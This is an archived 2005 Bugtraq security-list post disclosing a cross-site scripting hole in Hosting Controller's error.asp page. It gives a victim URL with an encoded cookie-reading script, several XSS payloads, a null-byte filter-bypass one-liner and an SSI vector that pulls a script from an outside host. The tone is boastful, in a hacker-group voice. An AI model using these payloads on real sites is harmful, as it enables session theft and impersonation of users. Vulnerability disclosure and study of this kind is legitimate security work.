Cross-Site Scripting (CSS) in Hosting Controller All Version and hot fix it hehe ;)

From: ActionSpider_at_securityfocus.com, (ActionSpider_at_securityfocus.com)
Date: 06/28/05

  • Next message: Christian Boenning: "[Fwd: phpBB 2.0.16 released]"
    Date: 28 Jun 2005 11:57:53 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    Cross-Site Scripting (CSS) in Hosting Controller All Version and hot fix it hehe ;)
                                                                                               ActionSpider@linuxmail.org
                                                                                               
    [Ashiyane Security Team ]
    [SegmentationFault Group] iam sun-os hehe :P
                                                                                              
    Greetz to : S4P0 - failed - Xsupr3mo - Status-x - Stealh
    Greetz to : berhooz - nima - ehsan - Mehrtash and ...
    www.ashiyane.com *

    *******************************************************************************************

    path : /admin/hosting/error.asp?error=

    http://www.victim.com/admin/hosting/error.asp?error=Xss vul

    example :

    JavaScript code : <script>alert(document.cookie)</script>

    in victim :

    http://www.victim.com/admin/hosting/error.asp?error=%3Cscript%3Ealert(document.cookie)%3C/script%3E

    1-about css :

    Cross-site scripting attacks place malicious code, usually JavaScript, in locations where
    other users see it. Target fields in forms can be addresses, bulletin board comments, and
    so on. The malicious code usually steals cookies, which would allow the attacker to impersonate
    the victim, or perform a social engineering attack, which may trick the victim
    into divulging his or her password. Hotmail and AOL have been plagued by this type of
    social engineering attack.
    One test suffices to indicate whether or not an application is vulnerable to a CSS attack.
    This is not intended to be a treatise on JavaScript or uber-techniques for manipulating
    browser vulnerabilities. Here are three methods that, if successful, indicate that an
    application is vulnerable

    ok it is too easy for u if u want work with other commend(other commend ??? hehe yeah other commend)

    elite Hacker Can use it for Acsess to Server hehe see other example for this mthoding ;)

    <script> SRC="c:\boot.ini"></script>

    <script>alert(src=C:\boot.ini)</script>

    <script>alert(document.cookie)</script>

    <script>alert('document.domain='+document.domain)</script>

    <script>document.write(document.cookie)</script>

    <script>alert('ActionSpider!')</script>

    and Here is a little known XSS attack vector using null characters.
    You can actually break up the HTML itself using the same nulls as shown above.
    I've seen this vector bypass some of the most restrictive XSS filters to date
    (again, only works in IE, Netscape 8.0 in trusted site mode and older versions Opera):
    perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

    SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector:
    <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://Ashiyane.org/action.js></SCRIPT>'"-->


  • Next message: Christian Boenning: "[Fwd: phpBB 2.0.16 released]"

    Relevant Pages

    • XSS vulnerabilities in Google.com
      ... XSS vulnerabilities in Google.com ... Two XSS vulnerabilities were identified in the Google.com website, ... Although Google uses common XSS countermeasures, a successful attack ... The server response lacks charset encoding enforcement, ...
      (Pen-Test)
    • Re: [Full-disclosure] Attacking the local LAN via XSS
      ... this is a url that carries an XSS attack http://192.168.0.1/ bla ... border router vulnerable to XSS ... For that purpose the malicious JavaScript fires several ...
      (Full-Disclosure)
    • Re: [Full-disclosure] on xss and its technical merit
      ... execution flow and as such make the attack stealthier. ... limited chars in a xss isnt really comparable to having limited characters ... Also "controlling execution flow" of a browser which you only control ... traditional attack techniques. ...
      (Full-Disclosure)
    • [Full-disclosure] dt_guestbook version 1.0f XSS vulnerability
      ... fully-featured message board system with admin interface. ... flaws it is possible for the remote attacker to conduct XSS attacks. ... This vulnerability can be exploited only when PHP register_globals is ... Vulnerability Impact: Attack ...
      (Full-Disclosure)
    • Re: [Full-disclosure] XSS vulnerabilities in Google.com
      ... > XSS will always remain part of the Full-Disclosure list if little ... >> legal to just audit a website without ... >> services or to mount a phishing attack. ... >> The server response lacks charset encoding enforcement, ...
      (Full-Disclosure)